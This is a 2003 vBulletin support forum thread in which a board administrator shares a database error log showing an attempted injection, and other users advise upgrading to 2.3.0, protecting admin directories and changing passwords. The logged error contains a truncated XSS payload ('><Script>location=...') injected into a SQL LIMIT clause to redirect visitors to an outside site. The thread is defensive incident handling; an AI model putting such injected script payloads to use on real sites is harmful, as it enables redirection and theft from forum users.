No announcement yet.

Hack attempt...

  • Filter
  • Time
  • Show
Clear All
new posts

  • Hack attempt...

    I checked my email today and had gotten 6 mails concerning "database error".

    Someone have tried, dunno if the person suceeded, in hacking/exploiting my boards.

    Here is one of the emails with the errors...
    Database error in vBulletin 2.2.8:

    Invalid SQL: SELECT thread.threadid
    FROM thread,subscribethread
    WHERE subscribethread.threadid=thread.threadid
    AND subscribethread.userid='1071'
    AND thread.visible=1 AND lastpost >= 1051784537
    ORDER BY lastpost DESC
    LIMIT 0,><Script>location='Http://

    mysql error: You have an error in your SQL syntax near '><Script>location='Http://
    ' at line 7

    mysql error number: 1064

    Date: Saturday 31st of May 2003 12:22:17 PM


    As you can see it was from someone at...

    Edit: i have removed the direct link now after beorn's post, any admin/mod can msg me to get the links/the dudes email address/ and his IP address if needed.

    Dunno if anything has happened, damaged, or if the exploiter got any info he shouldnt have as it was member2.php that is listed in the mail.

    Could anyone tell if it has done any harm?
    Should i close down the boards?




    Just found out that the exploiter actually signed up as member on my boards so i have his email address and IP address....
    Last edited by mindbuster; Sat 31 May '03, 9:52am.

  • #2
    vbexploit.php is no vB file. What does it do?


    • #3
      vBulletin XSS Injection Vulnerability: Exploit
      Coded By: Sp.IC--------------------------------------------------------------------------------

      its NOT A VB FILE suggest you remove it, and execute who put it there

      Quality Hosting - Viper Internet
      We Make Server Management Easy! - EasyServerManagement.COM


      • #4
        Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.


        • #5
          Umm, maybe i should be more specific, the vbexploit.php file is NOT on MY site ( ) , i have nothing to do with the site, thats the hacker site.

          If you try and click the link to the hackers site you can see it just keeps refreshing.

          I looked inside my members2.php file and there are no traces of any link to the above mentioned site.


          • #6
            Xiphiod, sure, changing password is a safety precaution, but could you explain what the attack could have done? could he have fetched the encrypted password list? is that why he signed up as member himself, then changed his password to easier decrypt the password list?

            Where can i read about changes from vB 2.8.0 to vB 2.9.0 ?

            And btw, umm, how do i change admin passwords? Within vBulletin or the admin UI?
            Last edited by mindbuster; Sat 31 May '03, 7:01am.


            • #7
              if you go into the admin cp look up your name on the user list there is an option to change your password...


              • #8
                EDIT: Ignore what this said...the script contains a redirect to the referrer....
                Last edited by Beorn; Sat 31 May '03, 9:48am.


                • #9
                  Ohh, ok beorn, anyway i edited the links out.


                  • #10
                    Immediately do what xiphoid suggested:

                    Originally posted by xiphoid
                    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.
                    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                    Change CKEditor Colors to Match Style (for 4.1.4 and above)

                    Steve Machol Photography

                    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.